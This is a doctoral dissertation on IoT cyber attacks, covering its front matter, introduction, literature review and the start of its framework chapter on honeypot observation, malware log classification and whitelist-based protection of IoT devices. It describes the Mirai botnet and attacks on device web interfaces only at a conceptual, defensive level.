124
A Study on Observation, Analysis, and Countermeasure of Cyber Attacks in IoT IoT におけるサイバー攻撃の観測、分析、および対 策に関する研究 By CHUNJUNG WU December, 2019 A doctoral dissertation submitted to the Graduate School of Environment and Information Sciences, Yokohama National University Principal Advisor: Professor Tsutomu MATSUMOTO

A Study on Observation, Analysis, and Countermeasure of

  • Upload
    others

  • View
    1

  • Download
    0

Embed Size (px)

Citation preview

A Study on Observation, Analysis, and Countermeasure of

Cyber Attacks in IoT

IoT におけるサイバー攻撃の観測、分析、および対

策に関する研究

By

CHUNJUNG WU

December, 2019

A doctoral dissertation submitted to

the Graduate School of Environment and Information Sciences,

Yokohama National University

Principal Advisor: Professor Tsutomu MATSUMOTO

2

i

Acknowledgement

First, I would like to express the deepest appreciation to my principal supervisor, Professor

Tsutomu Matsumoto, who has a genius attitude and substance: he constantly and convincingly

conveys the prudence and hard work of research. Without his guidance and persistent help, this

dissertation would not have been possible. I am incredibly grateful to Associate Professor

Katsunari Yoshioka, who taught me how to conduct cybersecurity research and write technical

papers. Without his leading, discussion, and support, I would not be able to finish my study. I also

gratefully acknowledge Professors Junji Shikata, whose intelligent comment and advice

significantly contributed to my research.

I would like to thank Professors Tatsunori Mori and Lecturer Shinichi Shirakawa for serving

on my dissertation committee. Their valuable comments were extremely constructive. Special

thanks go to Dr. Shin-Ying Huang from the Institute for Information Industry for insightful

discussion and beneficial collaboration. Special thanks go to Dr. Erwan Le Malecot for the critical

comments and help on the network infrastructure.

I am also indebted to the past and present members of the Matsumoto Laboratory, Shikata

Laboratory, and Yoshioka Laboratory. I learned a lot and got very much help from them. I also

appreciate the help from the secretaries of the Matsumoto Laboratory and Yoshioka Laboratory.

Ms. Mio Narimatsu, Ms. Tomoko Ishidate, Ms. Kumiko Nakayama, Ms. Kiyono Yoshitani, and

Ms. Emiko Kawamura. Their kindness supported me to graduate at Yokohama National

University.

Finally, I would like to thank my parents for their support and give me the chance to study at

Yokohama National University. I acknowledge everyone who helped me during my campus life.

ii

Abstract

In recent years, cyber attacks in IoT become increasingly rampant. Mirai Botnets executed the

massive distributed denial of service (DDoS) attack against Dyn DNS in 2016. The report from

Kaspersky in Sept. 2018, shows Mirai is still the most popular IoT malware family for

cybercriminals (20.9%). Besides, the IoT malware keeps evolving and exploits multiple

vulnerabilities to infect IoT devices. Since May 2018, the Mirai and Bashlite malware families

that assimilate many known exploits affecting the Internet of Things (IoT) devices. These exploits

come from 11 makers' devices over HTTP, UPnP, Telnet, and SOAP protocols. Despite malware,

human attackers also utilize various tools to access and collect variable information on the device.

For instances, web UI of IP Cameras and routers are constantly searched and accessed if

vulnerable. Hence the observation tool of cyber attacks in IoT should be reconsidered and

evaluated. In order to observe and analyze such a variety of attacks in depth, there is an increasing

need for bare-metal IoT devices as a honeypot, since it iss costly to emulate device-specific

vulnerabilities and complex functionalities from dedicated services. However, operating bare-

metal IoT honeypots has unique technical challenges, mostly coming from their low

configurability as an embedded system, and bringing management and information leak problems.

In chapter 3, we introduce frequent cyber attacks against IoT. Also, then we describe an

observation and analysis framework and countermeasure of cyber attacks in IoT. First is

techniques to support honeypot consisted of physical IoT devices. A bare-metal honeypot needs

proper access control while it is allowing attackers to access its inside to some degree, such as

filter out bricking commands and changes of critical configuration. The MITM proxy can control

incoming and outbound traffic of the honeypot, filter out unwanted attack flow, and prevent

information leak. Second is techniques of analyzing massive data of IoT honeypot. We apply text-

mining and machine learning algorithms to find new attack vector and categorized known Botnets'

iii

attacks. The third is a whitelisting-based countermeasure against cyber attacks in IoT. Despite

introducing the functionality, we showed how to protect the IoT devices in the honeypot from

unwanted cyber attacks. Also, we proposed a novel approach on how to create an appropriate

view which analyzes the incoming data in depth and utilize our resource efficiently. Finally, we

showed a method to recognize and remove the IoT malware process by examining the pathname

and binaries hash value hidden in "/proc" folder.

In chapter 4, we combine the ability of the transparent proxy and web tracking library, develop

a supporting mechanism for honeypot consisted of physical IoT devices. ThingGate can improve

the management ability of honeypot, extend the functionality of web tracking, manage the

incoming traffic, and output response content via MITM way. We evaluate ThingGate with seven

bare-metal IoT devices. The experiment results show that it successfully blocks unwanted

incoming attacks, masks wireless access point information of the devices, and tracks attackers on

the device web UI while showing high observability of various attacks exploiting different

vulnerabilities.

A drastic increase in cyber attacks targeting the Internet of Things (IoT) devices using telnet

protocols has been observed since 2016. Kaspersky report estimated that Telnet protocol is still

the primary attack vectors of cyber attacks in IoT (75%) in Sept. 2018. Therefore, in chapter 5,

we proposed a novel method based on malware binaries, command sequences, and meta-features

to analyzed 22.9GB Telnet log and 5,616 different malware binaries collected by IoT honeypot in

284 days. We employ both unsupervised or supervised learning algorithms and text-mining

algorithms for handling unstructured data. Clustering analysis is applied for finding malware

family members and revealing their inherent features for a better explanation. First, the malware

binaries are grouped using similarity analysis. Then, we extract key patterns of interaction

behavior using an N-gram model. We also train a multiclass classifier to identify IoT malware

iv

categories based on common infection behavior. For misclassified subclasses, second-stage sub-

training is performed using a file meta-feature. Our results demonstrate 96.70% accuracy, with

high precision and recall. The result indicates that even for a dataset spanning nine months, our

method remained valid. Although command sequences can change many times, the use of trigram

features can accurately distinguish Mirai, Bashlite, and Hajime malware, based on differences in

their infection command patterns. The clustering results reveal variant attack vectors and one

denial of service (DoS) attack that used pure Linux commands.

Many Internet-of-Things (IoT) devices, such as home routers and Internet Protocol (IP)

cameras, have been compromised through infection by malware as a consequence of weak

authentication and other vulnerabilities. Malware infection can lead to functional disorders and/or

misuse of these devices in cyber attacks of various kinds. However, unlike personal computers

(PCs), low-cost IoT devices lack rich computational resources, with the result that conventional

protection mechanisms, such as signature-based anti-virus software, cannot be used. In chapter 6,

we present IoTProtect, a light-weight and whitelist-based protection mechanism that can be

deployed easily on existing commercial products with very little modification of their firmware.

IoTProtect uses a whitelist to check processes running on IoT devices and terminate unknown

processes periodically. Our experiments using four low-cost IoT devices and 4,981 in-the-wild

malware binaries show that IoTProtect successfully terminated 99.92% of the processes created

by the binaries within 44 seconds after their infection with central processing unit (CPU) overhead

of 24% and disk space overhead of 288 KB.

v

Table of Contents Acknowledgement ......................................................................................................................... i Abstract ......................................................................................................................................... ii Table of Contents ......................................................................................................................... v List of Figures ............................................................................................................................ viii List of Tables ................................................................................................................................ ix Chapter 1. Introduction ............................................................................................................... 1

1.1. Motivations and Contributions ........................................................................................... 1 1.2. Organization ........................................................................................................................ 4

Chapter 2. Background and related work ................................................................................. 5 2.1 Internet of Things ................................................................................................................. 5 2.2. Cyber attacks in IoT ............................................................................................................ 5

2.2.1. Botnets ......................................................................................................................... 5 2.2.2. Cyber attacks against WebUI of Physical IoT Devices ............................................... 7

2.3. Related works of honeypot consist of physical IoT devices ............................................... 8 2.4. Related works of Malware Analysis through machine learning ......................................... 9 2.5. Related works of countermeasure against cyber attacks in IoT ........................................ 11

Chapter 3. Observation, Analysis, and Countermeasure of cyber attacks in IoT ............... 14 3.1. Observation of cyber attacks in IoT .................................................................................. 15 3.2. Analysis of cyber attacks in IoT ........................................................................................ 17 3.3. Countermeasure of cyber attacks in IoT ........................................................................... 18

Chapter 4. ThingGate: A gateway for flexible operation of bare-metal IoT honeypot ....... 20 4.1. Introduction ....................................................................................................................... 20 4.2. Definitions ......................................................................................................................... 21

4.2.1. Man-in-the-middle ..................................................................................................... 21 4.2.2. Transparent Proxy ...................................................................................................... 22 4.2.3. Browser fingerprinting ............................................................................................... 22 4.2.4. Cyber attacks against WebUI of Physical IoT Devices ............................................. 22

4.3. ThingGate ......................................................................................................................... 23 4.3.1. System goal ................................................................................................................ 23 4.3.3. System Architecture and Modules ............................................................................. 26

4.4. Evaluation ......................................................................................................................... 30 4.4.1. Prototype and dataset ................................................................................................. 30 4.4.2. Cyber attacks against the WebUI of physical IoT devices ......................................... 33 4.4.3. Blocking unwanted flow experiments ....................................................................... 34 4.4.4. Web tracking experiments .......................................................................................... 36

vi

4.4.5. Managing misplaced attacks experiments ................................................................. 39 4.4.6. Fabricated sensor information experiment ................................................................. 42 4.4.7. Stress testing against IoT devices .............................................................................. 44

4.5. Discussion ......................................................................................................................... 45 4.5.1. Limitations ................................................................................................................. 46

Chapter 5. IoT Malware Analysis and New Pattern Discovery Through Sequence Analysis

Using Meta-Feature Information ............................................................................................. 47 5.1. Introduction ....................................................................................................................... 47 5.2. Methods............................................................................................................................. 49

5.2.1 Preliminaries ............................................................................................................... 49 5.2.2. Encoding and measurement of command sequences ................................................. 52 5.2.3. Data analysis .............................................................................................................. 58

5.3. Experiments ...................................................................................................................... 61 5.3.1. Dataset and Environment ........................................................................................... 61 5.3.2. Clustering Experiments .............................................................................................. 63 5.3.3. Classification Experiments ........................................................................................ 65

5.4. Discussion ......................................................................................................................... 67 Chapter 6. IoTProtect: Highly Deployable Whitelist-based Protection for Low-cost

Internet-of-Things Devices ........................................................................................................ 70 6.1. Introduction ....................................................................................................................... 70 6.2. Preliminaries ..................................................................................................................... 72

6.2.1. Linux processes information ...................................................................................... 72 6.2.2. Files in IoT devices .................................................................................................... 74 6.2.3. Major premises of IoTProtect .................................................................................... 77

6.3. IoTProtect ......................................................................................................................... 78 6.4. Evaluation ......................................................................................................................... 81

6.4.1. Data collection and experimental devices .................................................................. 81 6.4.2. Removal experiment .................................................................................................. 82 6.4.3. Mitigating outgoing attacks ....................................................................................... 84 6.4.4. Trade-off between security and device performance ................................................. 86 6.4.5. Evaluation of easy deployment .................................................................................. 88

6.5. Discussion ......................................................................................................................... 89 6.5.1. Comparison with previous studies ............................................................................. 91 6.5.2. Limitations ................................................................................................................. 92

Chapter 7. Conclusion and future works ................................................................................. 94 7.1 Conclusion ......................................................................................................................... 94

vii

7.2. Future works ..................................................................................................................... 96 Bibliography ............................................................................................................................... 97 List of Paper ............................................................................................................................. 109

Reviewed papers in Journals .................................................................................................. 109 Preparing to submit papers in Journals .................................................................................. 109 Technical Reports ................................................................................................................... 109

Appendix ................................................................................................................................... 110 Appendix A ............................................................................................................................ 110 Appendix B ............................................................................................................................ 111

viii

List of Figures Fig. 1 Lifecycle of Mirai Botnet [16]. .................................................................................... 7 Fig. 2 Flow of studying cyber attacks in IoT. ...................................................................... 15 Fig. 3 System overview of ThingGate ................................................................................. 25 Fig. 4 System Architecture of ThingGate ............................................................................ 27 Fig. 5 The processing flow of Request controller ................................................................ 28 Fig. 6 The encoded URL of CI-URL and decoded results ................................................... 29 Fig. 7 Downloaded Scripts from CI-URL ............................................................................ 30 Fig. 8 The HTTP request of a modifying configuration attack. ........................................... 36 Fig. 9 Web Tracking flow of ThingGate .............................................................................. 37 Fig. 10 Country distribution of fingerprinted clients ........................................................... 38 Fig. 11 Googlebot’s user-agent and the verifying result ...................................................... 38 Fig. 12 Vulnerability distribution of CI-URL ...................................................................... 40 Fig. 13 Statistic of malware labels ....................................................................................... 42 Fig. 14 Fabricated Wi-Fi AP list .......................................................................................... 43 Fig. 15 Trigram statistics of Bashlite IoT malware. ............................................................. 56 Fig. 16 Trigram statistics of Mirai IoT malware. ................................................................. 57 Fig. 17 Trigram statistics of Satori IoT malware. ................................................................ 57 Fig. 18 Data analysis flow ................................................................................................... 59 Fig. 19 Labeled hierarchical clustering results of ECTs in April 2017 ................................ 64 Fig. 20 Statistics regarding attacking hosts observed by IoTPOT from January 2016 to March

2017.............................................................................................................................. 70 Fig. 21 Format of the maps [100] ........................................................................................ 74 Fig. 22 Filesystems of ASUS Wi-Fi router RT-AC3200 ...................................................... 75 Fig. 23 Distribution of ASUS RT-AC3200 files .................................................................. 77 Fig. 24 Experimental environment for measuring outgoing attack mitigation by IoTProtect

...................................................................................................................................... 85 Fig. 25 Results of experiment on mitigating outgoing attacks ............................................ 86 Fig. 26 Experimental environment for measuring the trade-off between performance and

security ......................................................................................................................... 87 Fig. 27 Results of experiment measuring trade-off ............................................................. 88

ix

List of Tables Table 1 IoT devices used in experiments. ............................................................................ 31 Table 2 Data set for analysis. ............................................................................................... 31 Table 3 HTTP method statistics for dataset 2. ..................................................................... 32 Table 4 Statistics of cyber attacks. Observation of 7 months.. ............................................ 33 Table 5 Cyber attacks against WebUI of IoT devices. Observation of 7 months from IP

Camera A1~A3, B, C, and D. ...................................................................................... 34 Table 6 Configuration blacklist and replaced pathnames against IP Camera A1~A3. ........ 35 Table 7 Features of the fingerprinted clients. ....................................................................... 39 Table 8 Information of Vulnerabilities. Observation of 7 months from IP Camera A1~A3, B,

C, and D. ...................................................................................................................... 40 Table 9 Part of attackers who request Wi-Fi information. Observation of 7 months from IP

Camera A1~A3, B, C, and D. ...................................................................................... 43 Table 10 IoT devices used in experiments. .......................................................................... 45 Table 11 Comparison of labels and infection command sequence [4]. ................................ 50 Table 12 Top 5 antivirus engines for IoT malware. ............................................................. 51 Table 13 An example of the command mapping table. ........................................................ 52 Table 14 Distance measures for different malware labels (average). .................................. 55 Table 15 Distance measures for different malware labels (minimum). ............................... 55 Table 16 Distance measures for different n-gram between Bashlite and Mirai ................... 58 Table 17 Time cost for different n-gram between Bashlite and Mirai ................................. 58 Table 18 Dataset for analysis. .............................................................................................. 61 Table 19 Malware categories and ECTs' distribution. ......................................................... 62 Table 20 Statistics of time cost. ........................................................................................... 62 Table 21 Victims of Fileless DoS. ........................................................................................ 65 Table 22 Classification performance of even sampling- Naive Bayes. ............................... 65 Table 23 Classification performance of even sampling- SVM. ........................................... 66 Table 24 Classification performance of random sampling- Naive Bayes. ........................... 66 Table 25 Classification performance of random sampling- SVM. ...................................... 66 Table 26 Precision/recall of SVM – second stage (reinforcement learning). ...................... 67 Table 27 Commercial secure software against embedded systems. .................................... 71 Table 28 Table of symbols. .................................................................................................. 79 Table 29 IoT devices used in conducting the experiments. ................................................. 81 Table 30 IoT malware used for conducting the experiments. .............................................. 82 Table 31 Results of the removal experiments. ..................................................................... 83 Table 32 IoTProtect overheads. ........................................................................................... 84

x

Table 33 Cost of creating whitelists. .................................................................................... 88

1

Chapter 1.

Introduction

1.1. Motivations and Contributions

Over the past years, people have been connecting various things to the internet for monitoring,

collecting data, or remote manipulation. Backend applications collect and exchange data with

these devices through the network. This network of this appearance is called the internet of things

(IoT). Gartner estimated that 6.4 billion IoT devices were in use in 2016, and the number is

projected to grow to 20.8 billion by 2020 [1]. Most IoT devices, however, utilize simple, low-

level hardware and antivirus and monitoring services are lacking. Moreover, many users were not

aware of changing the default credentials of admin accounts.

In Oct. 2016, an IoT Malware “Mirai” utilized a list of default credentials to login IoT devices

and grant root privilege. Also, it downloads malware binaries, conducts further infections, and

DDOS attacks. As a result, Mirai conducted the massive Distributed Denial of Service (DDOS)

attack against Dyn DNS. There are about 100,000 Mirai IoT Botnet nodes enlisted in this incident

and reported attack rates were up to 1.2 Tbps [2]. Therefore, cyber threats from IoT Botnet have

become a reality.

Further, IoT malware keeps evolving and exploits multiple vulnerabilities to infect IoT devices.

Since May 2018, the Mirai and Gafgyt malware families that assimilate multiple known exploits

affecting the Internet of Things (IoT) devices. These exploits come from 11 makers' devices over

HTTP, UPnP, Telnet, and SOAP protocols [3]. Besides the DDOS attack, new IoT malware has

diverse purposes including coin mining, click fraud, and sending spam emails. Nonetheless,

human attackers also utilize various tools to access and collect variable information on the device.

For examples, WebUI of many IP Cameras and routers are constantly searched and accessed if

2

vulnerable.

To observe cyber attacks against IoT devices and analyze the threats from IoT malware, some

researchers design new observation mechanisms and build various honeypots. These honeypots

include, for example, IoTPOT [4], SIPHON [5], IoTCandyJar [6], and real devices honeypot for

observing Web UI of IoT devices [7]. These honeypots successfully observed various cyber

attacks in IoT. However, some human-like attackers modify the configuration which impacts on

the effectiveness of honeypot such as changing network and updating the firmware. Besides, the

tremendous flow of cyber attacks in IoT raises an urgent necessity to develop a method which

analyzes the massive incoming data in depth and utilize resource efficiently. Moreover, we want

to find a solution for cyber attacks in IoT.

Based on the honeypot methodology and attack campaign of IoT malware, this dissertation

proposes three methods for observation, analysis, and countermeasure against cyber attacks in

IoT. The first method shows a control and protection mechanism for a bare-metal IoT honeypot.

Namely, a real IoT device, as a honeypot since it is costly to emulate device-specific

vulnerabilities and complicated functionalities provided through their WebUI and other dedicated

services, such as UPnP.

The first method focuses on managing the incoming traffic and response information of the

bare-metal IoT honeypot. We proposed ThingGate, which is a customized proxy between the

honeypot and internet transparently. ThingGate filtered out unwanted HTTP requests such as

deadly attack vectors and critical configuration change. Moreover, our program prevents the

leakage or exposure of sensitive information and injects fingerprinting JavaScript codes through

a man-in-the-middle (MITM) to track user clients. We utilize physical IoT devices as a honeypot,

and these devices are known to have been targeted by IoT malware. We cannot claim that the

honeypot can catch the whole attacks in IoT as we have only a limited number of devices for the

3

honeypot. There are some IoT viruses did not check targeted devices before they send malicious

HTTP requests. For the misplaced attack vectors which targeted IoT devices is not in our physical

IoT devices, the proxy redirects these vector to the analysis module to conduct further and real-

time analysis. With this approach, during 7 months of operation, our program successfully block

one critical configuration change attack. In addition, we collected 26 fingerprints of clients from

18 different source IPs. Besides, ThingGate sent fabricated Wi-Fi information to 44 different

clients who accessed the web page of Wi-Fi. ThingGate also analyzed 411 misplaced HTTP

requests, which contained 50 different URLs that exploited seven vulnerabilities. Moreover,

ThingGate successfully collected 150 different malware binaries and 23 scripts.

The second method focuses on applying machine learning techniques to analyze the observed

data from IoT honeypots. According to the report from Kaspersky in Sept. 2018, the most popular

attack and infection vector against devices remains the telnet service (75.4%) [8]. Thus the second

method targets the Telnet logs of the IoT honeypot. The method determines categories of malware

by analyzing its meta-features and command sequences. We extracted 2.7 million critical Telnet

logs from 22.9 GB Telnet log files. This approach mapped logs' commands to a smaller dataset

and performed classification and clustering analysis. Its contributions summarized as follows:

1. We proved that similar IoT malware binaries conduct similar infection commands. Moreover,

through similarity analysis of command sequences, we can identify the malware category of

unknown threats.

2. By clustering telnet logs, we discovered a new DoS cyber attack executed using pure Linux

commands, without IoT malware binaries.

3. Evaluating with 5,516 malware samples from the IoT honeypot, our proposed method could

identify four major malware categories with 96.70% accuracy.

The third method is a whitelisting method for protecting low-cost IoT devices. This method

4

checks binaries'md5 hash value and the pathname of user spaces processes. Moreover, then

remove the processes which are not in whitelists. We implemented a shell script prototype and

showed that it could be executed successfully on low-cost IoT devices, such as Wi-Fi routers and

storage, with marginal cost. We tested more than 4,981 different IoT malware binaries in four

different bare-metal IoT devices, and IoTProtect removed 99.92% of these malicious processes

successfully. For existing IoT devices, IoTProtect is an easy deployment application. The

installation procedure for the IoTProtect checker is very light and quick. The checker program is

written using Bash scripts, leading to portability between different Linux distributions. Moreover,

the fact that the size of the checker program is only 1.5 KB resulted in quick deployment on low-

cost IoT devices.

1.2. Organization

The rest of this dissertation is organized as follows. Chapter 2 presents the background and

related works. Chapter 3 describes the observation, analysis, and countermeasure of cyber attacks

in IoT. The methodology based on IoT honeypot consisted of physical IoT devices. Chapter 4

detailed the implementation of protect and management mechanism against IoT honeypot. This

approach focuses on preventing WebUI of physical IoT devices from information leak, unwanted,

and bricking attack. Chapter 5 discuss a novel analysis method towards the massive Telnet attack

vector logs for creating an in-depth view of cyber attacks in IoT. Chapter 6 discuss an IoT malware

removal method toward light-weight devices based on whitelisting. The dissertation concludes

with Chapter 7.

5

Chapter 2.

Background and related work

2.1 Internet of Things

The concept of a network of smart devices was discussed since 1982. There was a modified

Coke vending machine at Carnegie Mellon University, which became the first Internet-connected

appliance, be able to report its inventory and whether newly loaded drinks were cold or not [9].

In 1994, Reza Raji [10] described the concept in IEEE Spectrum as “moving small packets of

data to a large set of nodes, to integrate and automate everything from home appliances to entire

factories.”

The term “Internet of things” was likely coined by Kevin Ashton of MIT’s Auto-ID Center, in

1999, though he prefers the phrase “Internet for things.” At that point, he viewed Radio-frequency

identification (RFID) as essential to the Internet of things [11]. H., Eero, J., Grönvall, and K.,

Främling. Proposed an information system infrastructure for implementing smart, connected

objects mentioning the Internet of Things which more closely matches the modern IoT meaning

[12].

According to the Cisco Internet Business Solutions Group (IBSG), IoT formed in time when

more “things or objects” were connected to the Internet than people. Cisco Systems estimated that

the IoT was “born” between 2008 and 2009, with the things/people ratio growing from 0.08 in

2003 to 1.84 in 2010 [13].

2.2. Cyber attacks in IoT

2.2.1. Botnets

A Botnet is many Internet-connected devices, each of which is running one or more bots. Bots

are agent programs in compromised host machine which maintain access for attackers to control

6

them. Typically, a bot when installing on a victim machine establishes outbound connections to a

C&C server. Botnets can be used to perform distributed denial-of-service attack (DDoS attack),

steal data, send spam, and allows the attacker to access the device and its connection. The

botmaster can control the Botnet using command and control (C&C) software [14].

For Botnet malware, there are other malware families targeted IoT before Mirai such as

Bashlite [15]. While Mirai was the first IoT Botnet to emerge as a high-profile DDoS threat. In

2016, Mirai Botnet infected nearly 65,000 IoT devices in its first 20 hours before reaching a steady

state population of 200,000–300,000 infections [16]. Hence, we introduce the Mirai Botnet to

explain the Botnet attack campaign against IoT.

Fig. 1 shows the lifecycle of Mirai. From phase 1 Mirai asynchronously scans and "statelessly"

sent TCP SYN probes to pseudorandom IPv4 addresses, excluding those in a hard-coded IP

blacklist, on Telnet TCP ports 23 and 2323. If Mirai identifies a potential victim, it entered into a

brute-force login phase in which it attempted to establish a Telnet connection selected randomly

from a pre-configured list of 62 credentials. At the first successful login, Mirai sent the victim IP

and associated credentials to a hardcoded report server in phase 2. Report server dispatched victim

information to a loader in phase 3. A separate loader program infected these vulnerable devices

by downloading and executing architecture-specific malware in phase 4. With the operations from

phase 1 to phase 4, Mirai built the IoT Botnets. When the attacker wants to launch the DDoS

attack, the attacker sent commands to the C&C server in phase 5. The C&C server then relays the

commands to Bots in Botnets' devices in phase 6. Finally, these victim devices produce DDoS

flow and attack the DDoS Target in phase 7 [16].

7

Fig. 1 Lifecycle of Mirai Botnet [16].

2.2.2. Cyber attacks against WebUI of Physical IoT Devices

In 2017, Ezawa et al. [7] propose a Honeypot consisting of physical IoT devices to observe

cyber attacks against the WebUI of IoT devices. In 2018, Tamiya et al. [17] employed five IP

Cameras to build a decoy honeypot to capture the behavior of peeping attackers. According to

their observation, we summarized four kinds of cyber attacks against these WebUI:

1. Configuration information theft attacks

If the device contains vulnerabilities of information disclosure or weak credentials. The

attacker can collect the configuration and parameters of devices by some URLs, such as

get_status.cgi.

2. Modification of the configuration

Attackers may modify the DDNS, VPN, credentials, and network configuration which

impact the on the effectiveness of honeypot.

3. Snapshot attacks

Snapshot is a feature of IP Cameras and offers a current time image of the live stream

8

to users. Once the clients send the HTTP request of the snapshot, the web server will

provide the current time image in a JPG or PNG file.

4. Long term peeping

This attack collected by IP Cameras when some clients access the URL of the live stream.

Moreover, the clients stay on the web page of live streams for several hours.

2.3. Related works of honeypot consist of physical IoT devices

For observation of cyber attacks in IoT, researchers develop new tools and platform for

monitoring. In [5], Guarnizo et al. proposed the SIPHON architecture, which is a scalable high-

interaction honeypot platform for IoT devices. Our architecture leverages IoT devices physically

present at one location and connected to the Internet through so-called wormholes distributed

worldwide. The resulting architecture allows the exposure of a few physical devices over

numerous geographically distributed IP addresses.

Many embedded devices have WebUI for device management and operation, and some of them

are open to the Internet with vulnerability and weak credentials. Ezawa et al. [7] proposed the use

of a honeypot to monitor attacks against the WebUI of IoT devices by employing bare-metal

devices. The observation results contained attacks against regular web servers and indicated that

some attacks are automatically conducted through certain tools or types of malware. The

observation also suggests that some attackers changed the DDNS, VPN, and network settings,

resulting in the device becoming unavailable for other attackers.

Tamiya et al. [17] employed a decoy honeypot consisted of five IP Cameras to capture the

behavior of human-like attackers. His research shows the behavior including extracting

environment parameter of devices, downloading the snapshot of live streams, and long-term

peeping live streams.

Compared to existing literature, we find the previous honeypot of physical IoT devices lacks

9

abilities against sensitive information leaks and dangerous commands. Our work focuses on the

high interaction honeypot consisting of physical IoT devices. Our approach improves the security

of the honeypot, including protecting sensitive data collecting by sensors. Besides, our program

monitoring and manage the incoming traffic to avoid dangerous commands. Moreover, we

extended the web tracking function to WebUI of physical devices. Further, our setup allows us to

capture and analyze some misplaced attacks across different remote code execution vulnerabilities

in real-time.

2.4. Related works of Malware Analysis through machine learning

The IoT Botnets raised a massive attack flow against IoT devices all over the world, including

the IoT honeypot. IoT honeypot, such as IoTPOT successfully collected 124 million of attack

vector logs over Telnet protocol and 40,000 different malware binaries between 2015 and 2017.

To analyze the data in-depth and efficiently, we review the literature on the malware analysis

through machine learning. Yen et al. (2013) conducted an epidemiological study of malware

encountered in a large, multinational enterprise. They collected security and network

infrastructure logs to determine the key behavioral features of web-based malware. Moreover,

they used a logistical regression model to identify and rank the malware risk [18]. Masud, Khan,

and Thuraisingham presented a method of detecting malicious executables that combined three

types of features: binary N-grams, assembly instruction sequences, and dynamic-link library

function calls [19].

In 2015, Microsoft and Kaggle held the Malware Classification Challenge (BIG 2015), in

which Microsoft provided 20,000 Windows malware binary and assembler code files, with nine

categories of malware. Contestants had to classify the malware categories as well as possible. The

winning team extracted different features from the ASM file opcode and gathered pixel data from

malware disk images, then applied an N-gram algorithm to predict the malware category, thereby

10

achieving 99.7% accuracy. Ahmadi et al. subsequently used similar features to improve the

classification algorithm and achieve 99.8% accuracy with lower computational costs [20].

Drew, Moore, and Hahsler applies the Strand gene sequence classifier, which offers a robust

classification strategy that easily accommodates unstructured data, to malware classification.

Their method was used on approximately 500 GB of data to predict nine polymorphic malware

categories, and the results indicated that, with minimal adaptations, it achieved an accuracy of

well over 95% [21]. Most research has analyzed Windows-based malware and devised

experiments in MS Windows platforms.

For Linux/Unix malware, Shahzad and Farooq analyzed 709 Linux executable and linkable

format (ELF) files, extracting features from the ELF header and then applying machine-learning

classifiers to detect malware. Their method achieved 99% detection accuracy, with a false alarm

rate of less than 0.1% [22]. Bai et al. gathered features from ELF file system calls and tested four

classification algorithms (J48, Random Forests, AdboostM1, and IBK) for detecting Linux

malware, achieving a detection accuracy of approximately 98% [23].

Given that serious worm attacks have occurred through the Internet, Wang et al. proposed a

worm detection method based on mining dynamic program executions. They analyzed system

calls from MS Windows and Linux and traced system call sequences using a natural language

processing algorithm. They also applied the machine-learning algorithms Naive Bayes and

Support Vector Machines (SVM), with SVM achieving a 99.5% worm detection rate and a 2.22%

false positive rate [24].

For Android malware, Ham et al. [25] extracted features about the network, phone, message,

CPU, battery, and memory for each process in Android devices. They apply a linear SVM to

detect Android malware and compare the malware detection performance of SVM with that of

other machine learning classifiers. They show that the SVM outperforms other machine learning

11

classifiers with 0.995 Accuracy and 0.957 Precision.

Azmoodeh, Dehghantanha, and Choo [26] presented a deep learning based method to detect

Internet of Battlefield Things (IoBT) malware via the device’s Operational Code (OpCode)

sequence. They transmuted OpCodes into a vector space and apply a deep Eigenspace learning

approach to classify malicious and benign application. Their method could achieve 99.68%

accuracy and 98.37% recall.

Su et al. [27] proposed a novel lightweight method of detecting DDoS malware in IoT

environments. First, one-channel grayscale images converted from binaries were extracted, and

then a lightweight convolutional neural network was used to classify IoT malware families. The

experimental results indicated that this system could achieve 94.0% accuracy in goodware and

DDoS malware classification and 81.8% accuracy in classification of goodware and the two main

malware families.

Our study examined Linux malware. Its major difference from other research lay in the dataset.

We primarily analyzed shell commands from IoT malware, also examining the file meta-

information when necessary.

2.5. Related works of countermeasure against cyber attacks in IoT

According to the attack campaign of Mirai Botnet, we realized it is an urgent necessity to

develop a countermeasure for cyber attacks in IoT. Moreover, the countermeasure should be

applied for light-weight IoT devices. In this section we review the researches about whitelisting

solution for detecting malware.

Pareek, Romana, and Eswari consider that blacklisting-based solutions for detecting malware

suffer from problems of false positives and negatives. They share the idea of application

whitelisting that has been applied by security vendors and various other solutions. They also

12

provide details regarding design and implementation approaches and discuss challenges to

developing an effective whitelisting solution [28].

Obermeier, Schierholz, and Hristova apply whitelisting to applications for protecting industrial

automation and control systems. They find application whitelisting to be an effective means of

preventing the installation of malware [29]. Bhardwaj et al. developed a process monitoring

system based on blacklisting and whitelisting of process names [30]. Further, they developed an

application called “Debsums” to calculate the MD5 sums of an installed package and compare

them with those from existing processes [31]. However, an adversary can easily alter process

names and thus evade detection.

Paleari et al. present an architecture for automatic generation of procedures for recovery from

malicious programs. This method extracts the behavior of applications and monitors system calls

using QEMU, an emulator and monitor of virtual machines. In addition, they propose clustering

the behavior of malware to construct recovery procedures [32].

In 2011, Shahzad et al. proposed a classification-based method that analyzes a minimal feature

set of 11 features for distinguishing benign and malicious processes. This method provides 93%

detection accuracy with a 0% false alarm rate within 100 milliseconds [33].

In 2017, Tamiya et al. proposed a method for disinfecting IoT devices by merely rebooting or

resetting the infected devices [34]. Their experiments show that 45 existing IoT malware could

be erased by the simple operation of rebooting, but they did not present a detection method for

these malware binaries.

Koike et al. developed a whitelisting-based execution control technique called “WhiteEgret”

for the Linux operating system (OS). This module uses the bprm_check_security hook and the

mmap_file hook to monitor the absolute path of executable files. WhiteEgret permits execution

13

if the absolute path is contained in the whitelist and the hash value of the executable file is also

contained in the hash value whitelist [35].

As shown in the above literature review, there is no existing research on IoT cybersecurity

conducted on low-cost devices together with a process-level defense mechanism other than [35].

Moreover, all of the existing technologies require substantial modification of firmware and incur

a significant engineering cost if deployed on existing products. We propose a protection method

that is very light-weight and easy to deploy on existing low-cost IoT devices.

14

Chapter 3.

Observation, Analysis, and Countermeasure of cyber attacks

in IoT

This dissertation is about the research of cyber attacks in IoT. There are three phases in the

research and proposed one novel method in each phase. These three methods have no

dependencies and can be utilized individually. For research of cyber attacks, observation is the

first cornerstone of research. Many studies apply honeypot to observe cyber attacks in IoT. Some

of them choose virtual machines to emulate IoT devices. However, Emanuele et al. [36] proposed

research on analyzing 10,548 Linux malware binaries collected between Nov. 2016 and Nov. 2017.

They find 19 samples will detect Sandbox and 259 samples conduct process enumeration.

Therefore, some IoT malware may evade the IoT honeypot which consisted of virtual machines

in future. Besides, some cyber attacks targeted the physical IoT devices which are hard to emulate

by a virtual machine such as long-term peeping attack. As a result, our method focuses on physical

